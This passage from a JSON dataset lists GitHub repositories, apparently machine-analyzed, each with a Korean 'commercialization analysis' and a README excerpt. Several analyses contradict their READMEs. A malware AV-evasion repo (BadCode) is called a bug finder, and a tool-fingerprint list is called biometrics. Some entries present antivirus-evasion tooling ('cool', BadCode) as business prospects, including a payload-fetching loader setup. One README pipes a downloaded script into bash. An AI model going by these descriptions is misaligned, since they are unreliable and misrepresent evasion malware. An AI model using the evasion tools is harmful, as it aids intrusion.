수천 명의 사용자가 동시에 접속하는 클라우드 기반 업무 관리 도구의 안정성 제공\n2. **내부 업무 도구**: ","readme_excerpt":"# BBRPLUS lkl-haproxy\n\n`lkl-linux`+`haproxy` hack 版本 bbrplus，在 `OpenVZ` 工作良好。\n\n**注意**: \n1. 默认参数下需要至少 `256M` 空闲内存并开启 `TUN/TAP`。\n2. 如有更多内存，可在安装后对 `/etc/lklhaproxy/redirect.sh` 中的参数 `net.ipv4.tcp_wmem` 及 `LKL_HIJACK_BOOT_CMDLINE=mem` 进行调优。例如分别修改为：\n   ```\n   net.ipv4.tcp_wmem=4096 32768 4194304\n   LKL_HIJACK_BOOT_CMDLINE=mem=512M\n   ```\n   或\n   ```\n   net.ipv4.tcp_wmem=4096 131072 6048576\n   LKL_HIJACK_BOOT_CMDLINE=mem=2048M\n   ```\n   而后重启生效。\n3. 对多连接加速更为明显。\n\n## 使用方法\n\n支持 Alpine / Debian / Ubuntu / CentOS\n\n```bash\nwget --no-cache -O lkl-haproxy.sh https://github.com/mzz2017/lkl-haproxy/raw/master/lkl-haproxy.sh && bash lkl-haproxy.sh\n```\n\n## Linux Kernel Library\n\nhttps://github.com/mzz2017/linux\n\n## 感谢\n\n[tcp-nanqinlang/lkl-haproxy](https://github.com/tcp-nanqinlang/lkl-haproxy)\n\n[linhua55/lkl_study](https://github.com/linhua55/lkl_study)\n\n[bbrplus by dog250](https://blog.csdn.net/dog250/article/details/80629551)\n","composite_score":0.5055,"license_safety_tag":"restricted"},{"name":"reactwg/react-18","github_url":"https://github.com/reactwg/react-18","stars":7,"language":"","license":"unknown","abandonment_months":60,"description":"# React 18 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱을 만드는 데 핵심적으로 사용되는 React의 최신 버전으로, 더 빠르고 반응성 좋은 사용자 경험을 제공하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자상거래 플랫폼이나 협업 도구처럼 사용자가 많은 웹 서비스의 성능 개선\n2. **내부 업무 도구**: 기업의 관리","readme_excerpt":"# React 18 Working Group\n\nThis is the working group for React 18 release. It was formed to provide support to the community through the release. The working group is focused around online conversations which you can access by going to the [GitHub Discussions tab](https://github.com/reactwg/react-18/discussions).\n\nThe working group is currently structured to help manage discussions yet make the information available to everyone. If you're looking for the first discussion to read, **[Introducing React 18](https://github.com/reactwg/react-18/discussions/4)** is a good starting point.\n\nWorking group participants come from a representative set of the React community including educators, developers, and library authors. Participants can start GitHub discussions to ask questions and provide feedback on React 18. They can also comment on existing discussion threads. All discussions are public and available for everyone to follow along.\n\nTo learn more about the React 18 Working Group and its mi","composite_score":0.5055,"license_safety_tag":"unknown"},{"name":"youzan/zanui-weapp","github_url":"https://github.com/youzan/zanui-weapp","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":82,"description":"# youzan/zanapi-weapp 상용화 분석\n\n## 왜 보물인가\n중국 전자상거래 플랫폼인 유잔(有赞)의 공식 소형 프로그램 UI 라이브러리로, 이미 검증된 대규모 온라인 쇼핑몰에서 사용 중인 안정적인 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 온라인 쇼핑몰 구축 플랫폼**\n- 소상공인이 유잔의 소형 프로그램 기능을 쉽게","readme_excerpt":"<p>\n<a href=\"https://github.com/youzan/\"><img alt=\"有赞logo\" width=\"36px\" src=\"https://img.yzcdn.cn/public_files/2017/02/09/e84aa8cbbf7852688c86218c1f3bbf17.png\" alt=\"youzan\">\n</p></a>\n<p align=\"center\">\n    <img alt=\"项目logo\" src=\"https://img.yzcdn.cn/public_files/2017/02/06/ee0ebced79a80457d77ce71c7d414c74.png\">\n</p>\n<p align=\"center\">高颜值、好用、易扩展的小程序 UI 库</p>\n\n## 升级及更名提示\n\nZanUI-WeApp 现已升级为 [Vant Weapp](https://github.com/youzan/vant-weapp)，Vant Weapp 是有赞移动端组件库 Vant 的小程序版本，两者基于相同的视觉规范，提供一致的 API 接口，助力开发者快速搭建小程序应用。\n\n本仓库不再维护，请移步至 Vant Weapp 仓库.\n\nVant Weapp 仓库地址: [https://github.com/youzan/vant-weapp](https://github.com/youzan/vant-weapp)\n","composite_score":0.5054,"license_safety_tag":"safe"},{"name":"rbignon/doctoshotgun","github_url":"https://github.com/rbignon/doctoshotgun","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":54,"description":"# Doctoshotgun 상용화 분석\n\n## 왜 보물인가\n의사 찾기가 어려운 프랑스에서 병원 예약 시스템을 자동으로 모니터링하여 예약 가능 시간을 실시간으로 알려주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 월 구독으로 사용자들이 의사 예약 대기 시간을 자동 추적받는 웹/앱 서비스\n2. **내부 업무 도구**: 병원 네트워크","readme_excerpt":"# DOCTOSHOTGUN\n\nThis script lets you automatically book a vaccine slot on Doctolib in France and in Germany in\nthe next seven days.\n\n<p align=\"center\">\n  <img src=\"https://github.com/rbignon/doctoshotgun/raw/master/example.svg\">\n</p>\n\n## Python dependencies\n\n- [woob](https://woob.tech)\n- cloudscraper\n- dateutil\n- termcolor\n- colorama\n- playsound (optional)\n\n## How to use it\n\nYou need python3 for this script. If you don't have it, please [install it first](https://www.python.org/).\n\nInstall dependencies:\n\n```\npip install -r requirements.txt\n```\n\nRun:\n\n```\n./doctoshotgun.py <country{fr,de}> <city> <email> [<password>]\n```\n\nFurther optional arguments:\n\n```\n--debug, -d           show debug information\n--pfizer, -z          select only Pfizer vaccine\n--moderna, -m         select only Moderna vaccine\n--janssen, -j         select only Janssen vaccine\n--astrazeneca, -a     select only AstraZeneca vaccine\n--only-second, -2     select only second dose\n--only-third, -3      select only third dose","composite_score":0.5054,"license_safety_tag":"restricted"},{"name":"app-developers/top","github_url":"https://github.com/app-developers/top","stars":10,"language":"Swift","license":"MIT","abandonment_months":45,"description":"# app-developers/top 저장소 분석\n\n## 왜 보물인가\n개발자들이 자주 찾는 상위 콘텐츠를 자동으로 모아주는 도구로, 시간을 절약하면서 트렌드를 빠르게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자 커뮤니티 플랫폼에서 \"이주의 인기글\" 자동 큐레이션 기능\n- **내부 업무 도구**: 대형 IT회사의 개발팀","readme_excerpt":"# Top App Developers - September 2022\n\n- [Swift](#swift)\n- [Java](#java)\n- [Kotlin](#kotlin)\n\n# Swift\n## Ramotion [@Ramotion](https://github.com/Ramotion)\nLogo | <b>Website</b> | <b>Location</b> | <b>Social Networks</b>\n --- | :---: | --- | :---:\n <img src=\"https://avatars2.githubusercontent.com/u/6028820?s=200&v=4\" width=\"50\" height=\"50\"> | <a href=\"https://www.ramotion.com/agency/iphone-app-development/?utm_source=github&utm_medium=app-developers&utm_campaign=top\">ramotion.com</a> | San Francisco, CA 🇺🇸| <a href=\"https://twitter.com/ramotion\"><img src=\"https://github.com/app-developers/top/blob/master/sn%20icons/twitter.png\" width=\"40\" height=\"40\"></a> <a href=\"https://facebook.com/ramotion\"><img src=\"https://github.com/app-developers/top/blob/master/sn%20icons/facebook.png\" width=\"40\" height=\"40\"></a> \n\n Name | Demo | Description\n --- | :---: | ---\n[Animated Tab Bar](https://github.com/Ramotion/animated-tab-bar) | <img src=\"https://github.com/Ramotion/animated-tab-bar/raw/master/Scr","composite_score":0.5054,"license_safety_tag":"safe"},{"name":"ShichenLiu/CondenseNet","github_url":"https://github.com/ShichenLiu/CondenseNet","stars":14,"language":"Python","license":"MIT","abandonment_months":80,"description":"# CondenseNet 저장소 분석\n\n## 왜 보물인가\n이미지를 더 빠르고 효율적으로 인식하는 인공지능 모델로, 스마트폰이나 저사양 장비에서도 실시간으로 동작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 SaaS**: 스마트폰 카메라로 물건을 인식하는 구독형 앱 (예: 제품 자동 분류)\n2. **공장 자동화 API**: 제조업체에 판매하","readme_excerpt":"# CondenseNets\n\nThis repository contains the code (in PyTorch) for \"[CondenseNet: An Efficient DenseNet using Learned Group Convolutions](https://arxiv.org/abs/1711.09224)\" paper by [Gao Huang](http://www.cs.cornell.edu/~gaohuang/)\\*, [Shichen Liu](https://shichenliu.github.io)\\*, [Laurens van der Maaten](https://lvdmaaten.github.io) and [Kilian Weinberger](https://www.cs.cornell.edu/%7Ekilian/) (* Authors contributed equally).\n\n### Citation\n\nIf you find our project useful in your research, please consider citing:\n\n```\n@inproceedings{huang2018condensenet,\n  title={Condensenet: An efficient densenet using learned group convolutions},\n  author={Huang, Gao and Liu, Shichen and Van der Maaten, Laurens and Weinberger, Kilian Q},\n  booktitle={Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition},\n  pages={2752--2761},\n  year={2018}\n}\n```\n\n## Contents\n\n1. [Introduction](#introduction)\n2. [Usage](#usage)\n3. [Results](#results)\n4. [Discussions](#discussions)\n5. [Contact","composite_score":0.5054,"license_safety_tag":"safe"},{"name":"ObjTube/front-end-roadmap","github_url":"https://github.com/ObjTube/front-end-roadmap","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":23,"description":"# front-end-roadmap 상품화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 기술들을 체계적으로 정리한 학습 가이드로, 온라인 교육 시장에서 높은 수요가 있는 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 코딩 교육 플랫폼**\n프론트엔드 입문자들을 위한 학습 로드맵을 제공하는 유료 구독 서비스로 운영할 수 있습니다.\n\n**2","readme_excerpt":"# Front End Roadmap 🧶🦌\n\n一个帮助新手、初级、中级前端开发者不断精进学习的网站，前端学习路上，不再迷茫~\n\n🚀 [访问路线](https://objtube.github.io/front-end-roadmap/#/)\n\n📺 [Up主视频讲解前端学习路线](https://www.bilibili.com/video/BV1ZZ4y1H7rU/)\n\n\n## 功能\n\n1. 点击卡片可以进入到具体的页面，查看学习资料  \n2. 提供路线图下载的功能  \n3. 路线根据学习阶段进行了分级，可以查看每个阶段应该掌握的技术点  \n4. 可以关闭标签的标注（标注来着个人的看法，如不喜欢可以关掉） \n\n## 贡献指南\n\n方法一：\n\n* 点击右上角`fork`按钮，将项目`fork`到自己的Github账户里。\n\n* 使用`git clone`将项目克隆到本地。\n\n``` bash\ngit clone https://github.com/ObjTube/front-end-roadmap\n```\n\n* 用编辑器打开进行贡献，然后提交到`fork`的仓库。\n\n``` bash\ncode .\ngit add .\ngit commit -m \"What did I do?\"\ngit push origin master\n```\n\n* 提交`Pull request`\n\n\n\n方式二：\n\n* 在每个条目页面下方点击 `想要补充，点击这里📝` 的链接，将跳转到Github的文件编辑界面，即可在线编辑，之后再提交`Pull request`\n\n方法三：\n\n[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/ObjTube/front-end-roadmap)\n\n\n欢迎大家贡献学习资源 :heart:\n\n## 预览\n\n![路线图](./roadmap.jpeg)\n\n\n\n","composite_score":0.5054,"license_safety_tag":"safe"},{"name":"DennyZhang/challenges-kubernetes","github_url":"https://github.com/DennyZhang/challenges-kubernetes","stars":7,"language":"Shell","license":"Apache-2.0","abandonment_months":85,"description":"# DennyZhang/challenges-kubernetes 평가\n\n## 왜 보물인가\n쿠버네티스(클라우드 서비스 관리 도구)를 배우고 실습할 수 있는 문제 모음집으로, IT 인프라 관리자들의 핵심 기술 역량을 키우는 데 직접적으로 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 플랫폼**: IT 직원 재교육 프로그램에 포함된 유료 실습 코스","readme_excerpt":"* Deep Dive Into Kubernetes\n** Kubernetes Topics\ngithub tag [[https://github.com/topics/denny-kubernetes][#denny-kubernetes]]\n\n[[https://github.com/topics/denny-kubernetes][https://cdn.dennyzhang.com/images/github/k8s_github_repo.png]]\n\n** Kubernetes BootCamp\n #+BEGIN_HTML\n <a href=\"https://www.linkedin.com/in/dennyzhang001\"><img src=\"https://www.dennyzhang.com/wp-content/uploads/sns/linkedin.png\" alt=\"linkedin\" /></a>\n <a href=\"https://github.com/DennyZhang\"><img src=\"https://www.dennyzhang.com/wp-content/uploads/sns/github.png\" alt=\"github\" /></a>\n <a href=\"https://www.dennyzhang.com/slack\" target=\"_blank\" rel=\"nofollow\"><img src=\"https://slack.dennyzhang.com/badge.svg\" alt=\"slack\"/></a>\n <a href=\"https://github.com/DennyZhang\"><img align=\"right\" width=\"200\" height=\"183\" src=\"https://www.dennyzhang.com/wp-content/uploads/denny/watermark/github.png\" /></a>\n\n <br/><br/>\n\n <a href=\"http://makeapullrequest.com\" target=\"_blank\" rel=\"nofollow\"><img src=\"https://img.shields.io/badge/PRs-wel","composite_score":0.5054,"license_safety_tag":"safe"},{"name":"r0eXpeR/fingerprint","github_url":"https://github.com/r0eXpeR/fingerprint","stars":6,"language":"Ruby","license":"unknown","abandonment_months":55,"description":"# fingerprint 저장소 분석\n\n## 왜 보물인가\n사람의 얼굴, 지문, 홍채 등 생체정보를 인식하는 기술로, 스마트폰 잠금 해제나 보안 시스템에 필수적인 차별화된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 출입 통제 시스템 (직원 근태 관리, 보안 실시간 모니터링)\n2. **내부 업무 도구**: 은행·병원의 환자/고","readme_excerpt":"# fingerprint\n\n各种工具指纹以及自己整理的一些指纹分享。\n\nPS:欢迎提交 持续收集分享\n","composite_score":0.5053,"license_safety_tag":"unknown"},{"name":"PaperMC/Starlight","github_url":"https://github.com/PaperMC/Starlight","stars":6,"language":"Java","license":"NOASSERTION","abandonment_months":27,"description":"# Starlight 저장소 분석\n\n## 왜 보물인가\n마인크래프트 서버의 조명 처리 성능을 획기적으로 개선하는 핵심 기술로, 게임 서버 운영사들이 더 많은 플레이어를 수용하면서도 쾌적한 게임 환경을 제공할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **마인크래프트 호스팅 서비스**: 저가형 서버 플랜에서도 고성능을 제공하는 차별화 요소로 판매\n2. ","readme_excerpt":"Starlight (Fabric)\n==\nFabric mod for completely rewriting the vanilla light engine.\n\n## Future updates past 1.20\nPlease see: https://gist.github.com/Spottedleaf/6cc1acdd03a9b7ac34699bf5e8f1b85c\nThis project will not receive further updates for the foreseeable future.\n\n## Download\n[CurseForge (Fabric)](https://www.curseforge.com/minecraft/mc-mods/starlight)\n[Modrinth (Fabric)](https://modrinth.com/mod/starlight)\n\n## Contact\n[Discord](https://discord.gg/tuinity)\n\n## Results\n~~The graph below shows how much time the light engine was active while generating 10404 chunks:~~\nSee \"Notice about invalid gen test results\" in [TECHNICAL_DETAILS.md](TECHNICAL_DETAILS.md) \nfor why there is no 1.20 data for this test.\n\nBelow is a graph detailing how long light updates took for breaking/placing\na block on a large platform at y = 254 down to a large platform at y = 0:\n![Block update at height graph](https://i.imgur.com/ZQx7Ek0.png)\n- Tested via [LightBench](https://github.com/Spottedleaf/lightbench) o","composite_score":0.5053,"license_safety_tag":"unknown"},{"name":"tcoopman/image-webpack-loader","github_url":"https://github.com/tcoopman/image-webpack-loader","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# image-webpack-loader 분석 보고서\n\n## 왜 보물인가\n웹사이트에 올리는 사진 파일들을 자동으로 압축해서 웹페이지 로딩 속도를 빠르게 만들어주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 이미지 최적화 서비스**: 온라인 쇼핑몰이나 부동산 중개 사이트처럼 많은 사진을 다루는 고객사에게 이미지 자동 압축 기능을 구독료로 제","readme_excerpt":"![Dependencies status](https://david-dm.org/tcoopman/image-webpack-loader/status.svg)\n![devDependencies status](https://david-dm.org/tcoopman/image-webpack-loader/dev-status.svg)\n![Build status](https://github.com/tcoopman/image-webpack-loader/workflows/Testing/badge.svg)\n\n# DEPRECATED\n\nplease use: https://github.com/webpack-contrib/image-minimizer-webpack-plugin/\n\n# image-webpack-loader\n\nImage loader module for webpack\n\n> Minify PNG, JPEG, GIF, SVG and WEBP images with [imagemin](https://github.com/kevva/imagemin)\n\n*Issues with the output should be reported on the imagemin [issue tracker](https://github.com/kevva/imagemin/issues).*\n\n## Install\n\n```sh\n$ npm install image-webpack-loader --save-dev\n```\n\n### Install in container\n\n#### `node:12-buster`\n\nNo additional preparations required.\nAll dependencies will be compiled automatically.  \n**Not** recommended because of large image size (~1 GB).\n\n#### `node:12-buster-slim`\n\nPrepare script:\n\n```shell script\napt-get update\napt-get install -y","composite_score":0.5052,"license_safety_tag":"safe"},{"name":"netcan/asyncio","github_url":"https://github.com/netcan/asyncio","stars":82,"language":"C++","license":"MIT","abandonment_months":28,"description":"# netcan/asyncio 상용화 분석\n\n## 왜 보물인가\n프로그램이 여러 작업을 동시에 효율적으로 처리할 수 있도록 돕는 도구로, 웹 서비스나 앱의 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 알림 SaaS 서비스**: 수천 명의 사용자에게 동시에 메시지를 빠르게 전송하는 시스템\n2. **데이터 수집 API 판매**: ","readme_excerpt":"<!--ts-->\n* [asyncio](#asyncio)\n   * [Build &amp; Run](#build--run)\n   * [Hello world](#hello-world)\n   * [Dump callstack](#dump-callstack)\n   * [TCP Echo](#tcp-echo)\n      * [Client](#client)\n      * [Server](#server)\n      * [Benchmark](#benchmark)\n   * [Gather](#gather)\n   * [WaitFor](#waitfor)\n   * [ScheduledTask &amp; Cancel](#scheduledtask--cancel)\n   * [Tested Compiler](#tested-compiler)\n   * [TODO](#todo)\n   * [FAQ](#faq)\n      * [How to handle the cancelled coroutine?](#how-to-handle-the-cancelled-coroutine)\n      * [The coroutine performance and comparisons with other methods](#the-coroutine-performance-and-comparisons-with-other-methods)\n      * [Why needs some primitives(async_mutex/async_conditional_variable) even in the single threaded mode?](#why-needs-some-primitivesasync_mutexasync_conditional_variable-even-in-the-single-threaded-mode)\n      * [Why is the epoll version slower?](#why-is-the-epoll-version-slower)\n      * [io_uring better than epoll](#io_uring-better-than","composite_score":0.5052,"license_safety_tag":"safe"},{"name":"pglet/pglet","github_url":"https://github.com/pglet/pglet","stars":218,"language":"Go","license":"Apache-2.0","abandonment_months":45,"description":"# Pglet 프로젝트 분석\n\n## 왜 보물인가\n코딩 없이 아름다운 사용자 인터페이스를 만들 수 있는 오픈소스 도구로, 비개발자도 전문가처럼 보이는 앱을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소기업 고객을 위한 저비용 앱 개발 플랫폼으로 제공 (프리랜서가 빠르게 고객 맞춤형 도구 제작)\n2. **내부 업무 도구**","readme_excerpt":"# Project status\n\nPglet was superseded by [Flet](https://flet.dev) project with Flutter UI that works on web, mobile and desktop platforms.\nWe welcome you to give it a try and join our active and growing community on [Discord](https://discord.gg/dzWXP8SHG8).\n","composite_score":0.5052,"license_safety_tag":"safe"},{"name":"tenta-browser/tenta-dns","github_url":"https://github.com/tenta-browser/tenta-dns","stars":100,"language":"Go","license":"Apache-2.0","abandonment_months":72,"description":"# Tenta DNS 오픈소스 분석\n\n## 왜 보물인가\n인터넷 사용자의 개인정보 보호를 위해 만들어진 '안전한 인터넷 주소 찾기' 기술로, 점점 커지는 개인정보 보호 시장에서 핵심 기술로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **프라이버시 보호 VPN/브라우저 서비스**: Tenta DNS를 기반으로 개인정보 보호 기능을 강화한 구독형 서비","readme_excerpt":"Tenta DNS\n=========\n\n[![Build Status](https://travis-ci.org/tenta-browser/tenta-dns.svg?branch=master)](https://travis-ci.org/tenta-browser/tenta-dns)\n[![Go Report Card](https://goreportcard.com/badge/github.com/tenta-browser/tenta-dns)](https://goreportcard.com/report/github.com/tenta-browser/tenta-dns)\n[![GoDoc](https://godoc.org/github.com/tenta-browser/tenta-dns?status.svg)](https://godoc.org/github.com/tenta-browser/tenta-dns)\n\n![Tenta Gopher](logo.png?raw=true \"Tenta Gopher\")\n\nA full-fledged DNS solution, including DNSSEC and DNS-over-TLS\n\nTenta DNS provides a DNS server suite comprising an authoritative DNS server, recursive DNS server, and NSnitch,\nwhich provides a DNS server capable of recording the IP address of requests made against\nit and then makes that IP available via a JSON API. Tenta DNS also provides lookups for\nTor Node membership, DNS blacklist status and Geo data. Finally, Tenta DNS includes built-in\nBGP integration, offering single engine convenience for DNS anyca","composite_score":0.5052,"license_safety_tag":"safe"},{"name":"JingOS-team/JingOS","github_url":"https://github.com/JingOS-team/JingOS","stars":9,"language":"","license":"GPL-3.0","abandonment_months":53,"description":"# JingOS 저장소 분석\n\n## 왜 보물인가\n리눅스 기반의 태블릿/2-in-1 기기용 운영체제로, 터치 중심의 사용자 경험을 제공하는 독립적인 OS 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **태블릿 제조사의 기본 OS**: 갤럭시탭이나 아이패드 같은 태블릿 기기에 탑재하는 기본 운영체제로 라이선싱\n2. **교육용 기기 플랫폼**: 학교/학원의 ","readme_excerpt":"# JingOS\n### The World’s First Linux-Based OS Designed for Tablets\n\nJingOS is a 'convergent' Linux-based open-source mobile OS for tablets and mobile devices.\nIt can run Linux apps and Android apps.\nIt is created to allow natural control by touch, pencil, keyboard, and trackpad.\n\n[Download JingOS](https://en.jingos.com)\n\nHere are some other links:\n\n[JingPad A1](https://en.jingos.com/jingpad-a1/) - The World’s First Consumer-Level Linux Tablet.\n[Buy JingPad A1](http://shop.jingos.com)\n\n## Newsletter and Community \n[Mailing List](http://hk.mikecrm.com/pg5E05S)\\\n[Discord Channel](https://discord.gg/xEwDGW7RnJ)\\\n[Telegram Channel](https://t.me/JingOS_Linux)\\\n[Twitter](http://www.twitter.com/jingos_official)\\\n[YouTube](https://www.youtube.com/c/JingOS-team/videos)\\\n[Facebook Page](https://www.facebook.com/JingOSfb)\\\n[Matrix Room](https://matrix.to/#/#jingos:matrix.org)\\\n[Mastodon social](https://mastodon.social/@jingos_official)\n\n![](https://en-cdn.jingos.com/wp-content/uploads/brizy/143/as","composite_score":0.5052,"license_safety_tag":"restricted"},{"name":"damikun/trouble-training","github_url":"https://github.com/damikun/trouble-training","stars":6,"language":"C#","license":"MIT","abandonment_months":50,"description":"# damikun/trouble-training 상업화 분석\n\n## 왜 보물인가\n프로그래밍 초보자들이 흔히 겪는 오류 상황을 체계적으로 학습할 수 있는 교육 자료로, 개발자 양성 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **코딩 교육 플랫폼**: 온라인 프로그래밍 강좌 제공 서비스에 \"실전 오류 해결\" 모듈로 통합\n2. **기업 개발팀 ","readme_excerpt":"\n<h2 align=\"center\">Full Stack Workshop (Frontend + Backend + Monitoring) </h2>\n\n<p align=\"center\">\n  <img  width=\"900\" src=\"Doc/Assets/stack_logos.png\" alt=\"Workshop stack tools logos\" >\n</p>\n<p align=\"center\" > The application contains a full frontend and backend implementation (<b>Net6.0</b>🚀) with infrastructure and app monitoring. There are several patterns used such as. <b>Mediator, BFF, Domain</b> etc.. and everything is secured with <b>Identity server</b> fully supporting <b>OpenId Connect</b> and <b>OAuth2.0</b></p>\n\n<h5 align=\"center\" >\n\n  <a href=\"https://github.com/damikun/trouble-training/blob/main/Doc/WebHookBackend.md\" >WebHook backend setup</a></br>\n  <a href=\"https://github.com/damikun/trouble-training/blob/main/Doc/Logging.md\" >Configure Logging</a></br>\n  <a href=\"https://github.com/damikun/trouble-training/blob/main/Doc/OpenTelemetry.md\">Configure Tracing</a></br>\n  <a href=\"https://github.com/damikun/trouble-training/blob/main/Doc/Identity.md\">Configure Identity</a","composite_score":0.5052,"license_safety_tag":"safe"},{"name":"vaaaaanquish/Awesome-Rust-MachineLearning","github_url":"https://github.com/vaaaaanquish/Awesome-Rust-MachineLearning","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":32,"description":"# Awesome-Rust-MachineLearning 분석\n\n## 왜 보물인가\nRust라는 안전한 프로그래밍 언어로 만든 AI 학습 도구 모음으로, 빠르고 안정적인 인공지능 서비스를 만들고 싶은 사람들에게 필요한 자료들을 한곳에 모아놓았습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 분석 SaaS**: 회사 데이터를 자동으로 분석해주는 구독형 온라인 서","readme_excerpt":"![arml](https://github.com/vaaaaanquish/Awesome-Rust-MachineLearning/blob/main/public/img/arml.png?raw=true)\n\nThis repository is a list of machine learning libraries written in Rust.\nIt's a compilation of GitHub repositories, blogs, books, movies, discussions, papers.\nThis repository is targeted at people who are thinking of migrating from Python. 🦀🐍\n\nIt is divided into several basic library and algorithm categories.\nAnd it also contains libraries that are no longer maintained and small libraries.\nIt has commented on the helpful parts of the code.\nIt also commented on good libraries within each category.\n\nWe can find a better way to use Rust for Machine Learning.\n\n\n- [Website (en)](https://vaaaaanquish.github.io/Awesome-Rust-MachineLearning)\n- [GitHub (en)](https://github.com/vaaaaanquish/Awesome-Rust-MachineLearning/blob/main/README.md)\n- [GitHub (ja)](https://github.com/vaaaaanquish/Awesome-Rust-MachineLearning/blob/main/README.ja.md)\n\n\n# ToC\n\n- [Support Tools](https://github.com/vaa","composite_score":0.5051,"license_safety_tag":"safe"},{"name":"Rvn0xsy/BadCode","github_url":"https://github.com/Rvn0xsy/BadCode","stars":5,"language":"C++","license":"unknown","abandonment_months":51,"description":"# BadCode 저장소 분석\n\n## 왜 보물인가\n코드의 문제점을 자동으로 찾아주는 도구로, 소프트웨어 개발 과정에서 발생하는 버그를 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자들이 웹에서 코드를 업로드하면 문제점을 분석해주는 온라인 검사 도구\n2. **내부 업무 도구**: 회사의 개발팀이 자신들의 코드 품질","readme_excerpt":"﻿# BadCode\n\n恶意代码逃逸源代码\n\n可以根据以下链接学习、调试：\n\n- [静态恶意代码逃逸（第一课）](https://payloads.online/archivers/2019-11-10/1)\n- [静态恶意代码逃逸（第二课）](https://payloads.online/archivers/2019-11-10/2)\n- [静态恶意代码逃逸（第三课）](https://payloads.online/archivers/2019-11-10/3)\n- [静态恶意代码逃逸（第四课）](https://payloads.online/archivers/2019-11-10/4)\n- [静态恶意代码逃逸（第五课）](https://payloads.online/archivers/2019-11-10/5)\n- [静态恶意代码逃逸（第六课）](https://payloads.online/archivers/2020-01-02/1)\n- [静态恶意代码逃逸（第七课）](https://payloads.online/archivers/2020-10-23/1)\n- [静态恶意代码逃逸（第八课）](https://payloads.online/archivers/2020-11-29/1)\n- [静态恶意代码逃逸（第九课）](https://payloads.online/archivers/2020-11-29/2)\n- [静态恶意代码逃逸（第十课）](https://payloads.online/archivers/2021-02-08/1)\n- [静态恶意代码逃逸（第十一课）- 汇编语言编写Shellcode加载器](https://payloads.online/archivers/2022-02-16/1/)\n\n将会持续更新~ 总之，应该会更新\n\n","composite_score":0.5051,"license_safety_tag":"unknown"},{"name":"aetkrad/goby_poc","github_url":"https://github.com/aetkrad/goby_poc","stars":8,"language":"","license":"unknown","abandonment_months":53,"description":"# Goby PoC 저장소 분석\n\n## 왜 보물인가\nGoby는 보안 취약점을 자동으로 찾아내는 스캔 도구로, 기업들이 해킹으로부터 시스템을 미리 지킬 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 보안 문제를 고객사를 위해 자동 진단해주는 클라우드 기반 검사 플랫폼\n- **내부 업무 도구**: 개발팀이 코드를 올릴 때마","readme_excerpt":"# 声明\n本程序仅供于学习交流，请使用者遵守《中华人民共和国网络安全法》，勿将此脚本用于非授权的测试，脚本开发者不负任何连带法律责任。\n### 0x001 \ngoby用起来还是蛮方便的，网上公开的poc太少，区别已公开的列表，打算一日一更吧（理想状态）\n\n（如果你没有红队版，赶紧使用！）\n\n\n\n\n\n\n  \n \n","composite_score":0.5051,"license_safety_tag":"unknown"},{"name":"Ed1s0nZ/cool","github_url":"https://github.com/Ed1s0nZ/cool","stars":19,"language":"HTML","license":"unknown","abandonment_months":35,"description":"# Ed1s0nZ/cool 저장소 분석\n\n## 왜 보물인가\n마지막 업데이트가 2023년으로 다소 오래되었으나, 19개의 별표를 받은 것으로 보아 특정 분야에서 유용한 도구 또는 라이브러리로 평가받은 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회사 직원들이 일상 업무를 자동화하거나 효율화하는 소프트웨어로 판매\n- **SaaS 서비","readme_excerpt":"# cool\n时间线：\n- Golang Gin 框架写的免杀平台- (2021.11.12)\n- Golang Gin 框架写的免杀平台，更新捆绑免杀- (2021.11.20)\n- 增加自定义捆绑，修复一个小bug- (2021.11.22)\n- 上传\"compile.exe_备份\"，在\\service\\executable\\下，如果生成免杀是0kb的话就把原来的compile.exe删掉，把\"compile.exe_备份\"改成compile.exe，这样的话混淆效果会变差。。。但是至少能用了-（2021.11.25）\n## 安装\n1. 安装Go环境，版本要**1.17**及以上；\n2. 如果是首次安装Go环境，安装完毕后要配置代理，执行以下这两条命令:\n -  **go env -w GO111MODULE=on** \n -  **go env -w GOPROXY=https://goproxy.io,direct** \n3. 完毕后执行 **go install mvdan.cc/garble@latest** ；\n4. 下载本项目到D盘根目录，文件夹名字改为cool；\n5. 运行cool.exe；\n6. 访问 **http://127.0.0.1:9000** 。\n\n## 使用\n为减去浏览器扫描的时间，故生成的文件格式为txt，使用时只需要把后缀修改为前端提示的后缀就可以了。\n### 1. 加密1\n- 直接执行exe。\n### 2. 加密2\n- 直接执行exe。\n### 3. 分离1(houqing) \n- 用python起一个HTTP服务(python -m http.server 8080)，\n- 把图片放到起http服务的目录下，\n- 执行exe 参数为http服务的图片路径（xxx.exe http://127.0.0.1:8080/a.jpg) 。\n### 4. 分离2\n#### 上线方式1\n- 用python起一个HTTP服务(python -m http.server 